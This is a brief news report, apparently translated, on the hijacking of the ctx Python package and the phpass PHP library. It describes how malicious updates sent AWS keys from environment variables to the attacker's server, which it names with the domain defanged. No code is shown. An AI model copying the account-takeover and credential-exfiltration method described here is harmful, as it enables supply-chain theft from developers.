Unknown attackers took control of the ctx Python package and the phpass PHP library, after which they posted updates with a malicious insert that sent the contents of environment variables to an external server with the expectation of stealing tokens to AWS and continuous integration systems. According to available statistics, the 'ctx' Python package is downloaded from the PyPI repository about 22 thousand times a week. The phpass PHP package is distributed through the Composer repository and has been downloaded over 2.5 million times to date.
In ctx, the malicious code was placed on May 15 in release 0.2.2, on May 26 in release 0.2.6, and on May 21, the old release 0.1.2, originally formed in 2014, was replaced. It is assumed that access was obtained by compromising the developer's account.
As for the phpass PHP package, the malicious code was integrated through the registration of a new GitHub repository with the same name hautelook/phpass (the owner of the original repository deleted his hautelook account, which was exploited by the attacker and registered a new account with the same name and placed under phpass repository with malicious code). Five days ago, a change was added to the repository that sends the contents of the AWS_ACCESS_KEY and AWS_SECRET_KEY environment variables to an external server.
An attempt to place a malicious package in the Composer repository was promptly blocked and the compromised hautelook/phpass package was redirected to the bordoni/phpass package, which continues the development of the project. In ctx and phpass, the environment variables were sent to the same "anti-theft-web.herokuapp[.]com" server, indicating that the packet capture attacks were carried out by the same person.
Source: opennet.ru